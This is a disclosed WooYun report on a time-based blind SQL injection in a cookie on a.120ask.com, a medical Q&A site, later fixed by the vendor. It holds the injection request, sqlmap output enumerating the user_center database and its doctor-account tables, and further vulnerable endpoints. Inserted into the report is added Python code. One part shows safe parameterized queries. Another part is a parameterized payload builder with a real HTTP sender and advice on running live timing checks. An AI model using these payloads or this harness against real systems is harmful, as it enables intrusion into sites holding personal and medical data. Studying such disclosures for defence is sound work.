Vulnerability summary

Defect ID: wooyun-2015-0146090

Title: Improper filtering of a parameter in 快速问医生 allows cookie injection

Vendor: 快速问医生

Author: 天地不仁 以万物为刍狗

Submitted: 2015-10-12 14:09

Fixed: 2015-11-29 09:28

Disclosed: 2015-11-29 09:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-10-12: Details reported to the vendor, awaiting vendor response
2015-10-15: Vendor confirmed; details visible to the vendor only
2015-10-25: Details disclosed to core white hats and domain experts
2015-11-04: Details disclosed to regular white hats
2015-11-14: Details disclosed to trainee white hats
2015-11-29: Details disclosed to the public

Brief description:

A dark street corner, a quiet rainy night; who is calling, like the wind, shattering on the far shore of dreams.

Detailed description:

Request:

GET /forget_pwd HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Cookie: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR'"XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR"*/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid%3D1553699147-1444573889-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
X-Requested-With: XMLHttpRequest
Referer: http://a.120ask.com/
Host: a.120ask.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


The ASKSID cookie parameter is not filtered before it reaches the database, so it is injectable (time-based blind SQL injection, as the sqlmap output below shows).
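The finding above is a single sentence; the following added example (mine, not code from the report or from 快速问医生) shows the pattern that produces it and its fix. The Cookie header, the sessions table and the function names are constructed assumptions, since the report does not show the backend. A cookie value containing a single quote ends the string literal the application built around it, and the remainder of the value is executed as SQL; the same lookup with a bound parameter is immune. SQLite is used so the example runs offline; the report's own payload is MySQL-specific (XOR, sleep(), sysdate()), so a portable quote-breaking value stands in for it.

```python
import sqlite3

# Constructed sample input: a Cookie header in the shape of the report's, cut
# down to three cookies, with ASKSID carrying a quote-breaking value. The
# report's MySQL payload uses 'XOR(...)OR' to escape the same quoted context;
# this SQLite-portable equivalent rewrites the WHERE clause instead.
COOKIE_HEADER = (
    "__jsluid=a8ad89913c0d4004064d4948aff7eb69; "
    "ASKSID=abc' OR '1'='1; "
    "HMACCOUNT=3FFF731E72B1C8DA"
)


def parse_cookie_header(header: str) -> dict:
    """Split a Cookie header into {name: value}.

    Values are taken verbatim: the report's ASKSID contains quotes, slashes
    and parentheses, which stricter cookie parsers may reject, hiding exactly
    the value a defender needs to see."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = value
    return cookies


def build_db() -> sqlite3.Connection:
    """Hypothetical sessions table standing in for the real backend, which
    the report does not show (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (asksid TEXT PRIMARY KEY, username TEXT)")
    conn.executemany(
        "INSERT INTO sessions VALUES (?, ?)",
        [("s3cr3t-session-1", "doctor_zhang"), ("s3cr3t-session-2", "admin")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, asksid: str):
    """The pattern the report implies: the cookie value is spliced into SQL
    text, so a quote in the value ends the literal and the remainder runs as
    SQL. Deliberately vulnerable."""
    sql = "SELECT username FROM sessions WHERE asksid = '" + asksid + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, asksid: str):
    """Hardened form: a bound parameter is only ever compared as data."""
    row = conn.execute(
        "SELECT username FROM sessions WHERE asksid = ?", (asksid,)
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both lookups against the forged ASKSID from COOKIE_HEADER."""
    conn = build_db()
    asksid = parse_cookie_header(COOKIE_HEADER)["ASKSID"]
    return lookup_vulnerable(conn, asksid), lookup_safe(conn, asksid)


if __name__ == "__main__":
    vulnerable, safe = demo()
    print("string-concatenated query:", vulnerable)  # some real user's session
    print("parameterized query:      ", safe)        # None
```

The forged cookie never matches a stored session, yet the concatenated query returns a logged-in user because the WHERE clause has become `asksid = 'abc' OR '1'='1'`; the parameterized query compares the whole value as one string and finds nothing.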

[screenshot: 0.png]


[screenshot: 1.png]


Two databases were found; the user_center database contains 122 tables.

[screenshot: 2.png]


For lack of time I did not dump them here. The deleted-doctor-account table is there, among others; have a look for yourselves.

web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:22:31] [INFO] fetching tables for database: 'user_center'
[00:22:31] [INFO] fetching number of tables for database 'user_center'
[00:22:31] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[00:22:31] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[00:22:35] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[00:23:07] [INFO] adjusting time delay to 1 second due to good response times
22
[00:23:13] [INFO] retrieved: adm
[00:23:55] [ERROR] invalid character detected. retrying..
[00:23:55] [WARNING] increasing time delay to 2 seconds
in_title_1
[00:26:51] [INFO] retrieved: admin_title_2
[00:27:54] [INFO] retrieved: alias_bind_log
[00:31:45] [INFO] retrieved: area_info
[00:34:12] [INFO] retrieved: ask_head
[00:36:12] [INFO] retrieved: base_hospital
[00:39:55] [INFO] retrieved: class_relation
[00:43:51] [INFO] retrieved: doctor_auth_apply
[00:49:11] [INFO] retrieved: doctor_auth_base
[00:50:54] [INFO] retrieved: doctor_auth_t
[00:52:33] [ERROR] invalid character detected. retrying..
[00:52:33] [WARNING] increasing time delay to 3 seconds
ype
[00:54:00] [INFO] retrieved: doctor_auth_type_status
[00:58:41] [INFO] retrieved: doctor_class
[01:01:18] [INFO] retrieved: doctor_del_user
[01:05:23] [INFO] retrieved: doctor_education
[01:09:41] [INFO] retrieved: doctor_ext
[01:11:48] [INFO] retrieved: doctor_fla


Proof of vulnerability:

(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 344 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))gusd) AND 'ENhF'='ENhF'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid=1553699147-1444573889-http%3A%2F%2Fwww.acunetix-referrer.com%2F%26ntime=1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%3A%2F%2Fwww.acunetix-referrer.com%2F|1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
---
[00:05:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:05:06] [INFO] fetching database names
[00:05:06] [INFO] fetching number of databases
[00:05:06] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[00:05:06] [INFO] retrieved:
[00:05:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
2
[00:05:29] [INFO] retrieved:
[00:05:39] [INFO] adjusting time delay to 2 seconds due to good response times
[00:06:02] [ERROR] invalid character detected. retrying..
[00:06:02] [WARNING] increasing time delay to 3 seconds
info
[00:08:29] [ERROR] invalid character detected. retrying..
[00:08:29] [WARNING] increasing time delay to 4 seconds
rmation_schema
[00:15:57] [INFO] retrieved: user_center
[00:22:11] [ERROR] invalid character detected. retrying..
[00:22:11] [WARNING] increasing time delay to 5 seconds
available databases [2]:
[*] information_schema
[*] user_center
[00:22:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\a.120ask.com'
[*] shutting down at 00:22:12
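What the sqlmap transcript above records, step by step: the scanner's original ASKSID value is a three-context polyglot (unquoted, single-quoted and double-quoted SQL contexts) whose sleep(0) is inert; sqlmap's confirmation swaps `AND (SELECT * FROM (SELECT(SLEEP(5)))gusd)` into the single-quoted branch and watches for the delay; and the warnings about a "larger statistical model" and not stressing the network adapter exist because response time is the only signal, and network jitter can fake it. The added example below (mine, not from the report or the vendor) rebuilds that payload with the delay as a parameter and implements the timing decision the way a careful tester would: interleaved inert/delayed requests, medians rather than single samples, and a threshold relative to the requested delay. The two simulated backends are constructed stand-ins so the file runs offline; send_http is a real http.client transport that is defined but never called here.

```python
import http.client
import re
import statistics
import time
from typing import Callable


def time_based_payload(seconds: float) -> str:
    """Rebuild the ASKSID value from the report with the sleep duration as a
    parameter. It is a three-context polyglot: the first probe runs if the
    value lands unquoted (the /* ... */ comments the rest out), the 'XOR(...)OR'
    segment runs inside a single-quoted literal, and the "XOR(...)OR" segment
    inside a double-quoted one. time_based_payload(0) is byte-for-byte the
    inert probe the report's request carries."""
    probe = f"if(now()=sysdate(),sleep({seconds}),0)"
    payload = f"{probe}/*'XOR({probe})OR'\"XOR({probe})OR\"*/"
    # Commas split the cookie value for some parsers; the report sent %2C.
    return payload.replace(",", "%2C")


def cookie_header(asksid: str) -> str:
    """Only ASKSID matters for the injection; the other cookies are omitted."""
    return f"ASKSID={asksid}"


def confirm_time_based(send: Callable[[str], float], delay: float = 5.0,
                       trials: int = 3, ratio: float = 0.8) -> bool:
    """Decide whether sleep(delay) in ASKSID measurably slows the response.

    `send` takes a Cookie header and returns elapsed seconds. Inert (sleep 0)
    and delayed requests are interleaved and their medians compared, so one
    slow baseline caused by jitter cannot yield a false positive, and the
    observed slowdown must reach `ratio` of the requested delay."""
    baseline, delayed = [], []
    for _ in range(trials):
        baseline.append(send(cookie_header(time_based_payload(0))))
        delayed.append(send(cookie_header(time_based_payload(delay))))
    extra = statistics.median(delayed) - statistics.median(baseline)
    return extra >= ratio * delay


def send_http(host: str, path: str, cookie: str, timeout: float = 30.0) -> float:
    """Real transport (not invoked in this file): one GET carrying the crafted
    Cookie header, mirroring the report's request, returning elapsed seconds."""
    start = time.perf_counter()
    conn = http.client.HTTPConnection(host, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Cookie": cookie,
                                           "X-Requested-With": "XMLHttpRequest"})
        conn.getresponse().read()
    finally:
        conn.close()
    return time.perf_counter() - start


def simulated_vulnerable_backend(cookie: str) -> float:
    """Constructed stand-in for a server that concatenates ASKSID into a MySQL
    query: sleep(N) in the cookie really costs N seconds of response time."""
    start = time.perf_counter()
    time.sleep(0.01)  # fixed stand-in for network latency
    match = re.search(r"sleep\(([0-9.]+)\)", cookie)
    if match:
        time.sleep(float(match.group(1)))
    return time.perf_counter() - start


def simulated_patched_backend(cookie: str) -> float:
    """Constructed stand-in for a parameterized backend: the payload is inert."""
    start = time.perf_counter()
    time.sleep(0.01)
    return time.perf_counter() - start


if __name__ == "__main__":
    print("Cookie:", cookie_header(time_based_payload(5)))
    print("vulnerable backend:", confirm_time_based(simulated_vulnerable_backend, delay=0.5))
    print("patched backend:   ", confirm_time_based(simulated_patched_backend, delay=0.5))
    # Against a real endpoint `send` would be: lambda c: send_http(host, path, c)
```

With the default delay of 5 seconds and three trials a live check spends about 15 seconds sleeping on the server side; on a noisy link raise `trials` rather than lowering `delay`, because the decision threshold scales with the delay and a short sleep is easily buried in jitter.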

Fix recommendation:

Several other locations also accept this injectable cookie parameter:

http://a.120ask.com/askregsave
http://a.120ask.com/checking/
http://a.120ask.com/user/ajax_checkcode
http://a.120ask.com/user/reg_checking/

Copyright notice: when reposting, please credit the source: 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2015-10-15 09:27

Vendor reply:

The vulnerability has been confirmed; a gift will be arranged shortly.

Latest status:

None